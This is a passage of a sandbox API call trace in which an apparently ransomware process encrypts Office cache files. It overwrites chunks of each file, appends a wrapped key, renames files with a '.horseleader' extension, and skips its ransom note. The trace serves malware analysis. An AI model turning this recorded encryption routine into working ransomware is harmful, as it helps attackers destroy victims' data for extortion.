SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9b200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.838] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.841] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.841] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.841] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.841] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.841] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.842] CloseHandle (hObject=0x21c) returned 1 [0211.845] GetProcessHeap () returned 0x780000 [0211.845] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.845] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.horseleader") returned 90 [0211.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all 
users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.horseleader")) returned 1 [0211.846] GetProcessHeap () returned 0x780000 [0211.846] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.846] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0211.846] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="Windows") returned -1 [0211.846] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0211.846] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".horseleader") returned 0x0 [0211.846] lstrcmpW (lpString1="OfficeLR.cab", lpString2="#Decrypt#.txt") returned 1 [0211.846] lstrcmpW (lpString1="OfficeLR.cab", lpString2="_uninstalling_.png") returned 1 [0211.846] lstrlenW (lpString=".testttjffg") returned 11 [0211.846] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", lpSrch=".testttjffg") returned 0x0 [0211.846] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.846] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.846] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.847] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0211.847] StrStrW (lpFirst="OfficeLR.cab", lpSrch=".txt") returned 0x0 [0211.847] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=14127746) returned 1 [0211.847] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.847] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.882] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.882] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.882] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6ba141, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.882] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.895] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.895] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.895] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd74282, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.895] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.943] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.943] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.943] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.943] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.943] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.943] CloseHandle (hObject=0x21c) returned 1 [0211.944] GetProcessHeap () returned 0x780000 [0211.944] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.944] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.horseleader") returned 91 [0211.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.horseleader")) returned 1 [0211.944] GetProcessHeap () returned 0x780000 [0211.944] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.944] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0211.944] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="Windows") returned -1 [0211.945] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0211.945] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".horseleader") returned 0x0 [0211.945] lstrcmpW (lpString1="OfficeMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0211.945] lstrcmpW (lpString1="OfficeMUI.msi", lpString2="_uninstalling_.png") returned 1 [0211.945] lstrlenW (lpString=".testttjffg") returned 11 [0211.945] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", lpSrch=".testttjffg") returned 0x0 [0211.945] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.945] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.945] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.945] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0211.945] StrStrW (lpFirst="OfficeMUI.msi", lpSrch=".txt") returned 0x0 [0211.945] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=3702272) returned 1 [0211.945] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.945] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.959] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.959] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.959] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1c1700, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.959] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.969] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.969] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.969] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x382e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.969] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.984] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.984] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.984] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.984] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.984] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, 
lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.985] CloseHandle (hObject=0x21c) returned 1 [0211.985] GetProcessHeap () returned 0x780000 [0211.985] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.985] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.horseleader") returned 92 [0211.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.horseleader")) returned 1 [0211.986] GetProcessHeap () returned 0x780000 [0211.986] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.986] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0211.986] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="Windows") returned -1 [0211.986] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0211.986] StrStrIW 
(lpFirst="OfficeMUI.xml", lpSrch=".horseleader") returned 0x0 [0211.986] lstrcmpW (lpString1="OfficeMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0211.986] lstrcmpW (lpString1="OfficeMUI.xml", lpString2="_uninstalling_.png") returned 1 [0211.986] lstrlenW (lpString=".testttjffg") returned 11 [0211.986] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpSrch=".testttjffg") returned 0x0 [0211.986] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.986] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.986] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.987] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0211.987] StrStrW (lpFirst="OfficeMUI.xml", lpSrch=".txt") returned 0x0 [0211.987] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=5557) returned 1 [0211.987] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x15b5, lpOverlapped=0x0) returned 1 [0211.989] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffea4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.989] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x32af06c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x15b5, lpOverlapped=0x0) returned 1 [0211.990] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.990] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0211.990] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0211.990] CloseHandle (hObject=0x21c) returned 1 [0211.990] GetProcessHeap () returned 0x780000 [0211.990] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0211.990] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.horseleader") returned 92 [0211.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.horseleader")) returned 1 [0211.991] GetProcessHeap () returned 0x780000 [0211.991] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0211.991] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, 
ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0211.991] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="Windows") returned -1 [0211.991] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0211.991] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".horseleader") returned 0x0 [0211.991] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2="#Decrypt#.txt") returned 1 [0211.991] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2="_uninstalling_.png") returned 1 [0211.991] lstrlenW (lpString=".testttjffg") returned 11 [0211.991] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi", lpSrch=".testttjffg") returned 0x0 [0211.991] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.991] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.991] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.991] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0211.991] StrStrW (lpFirst="OfficeMUISet.msi", lpSrch=".txt") returned 0x0 [0211.992] GetFileSizeEx 
(in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=868864) returned 1 [0211.992] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.992] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.998] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.998] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.998] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x67900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.998] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.008] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.008] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.009] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xcf200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.009] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 
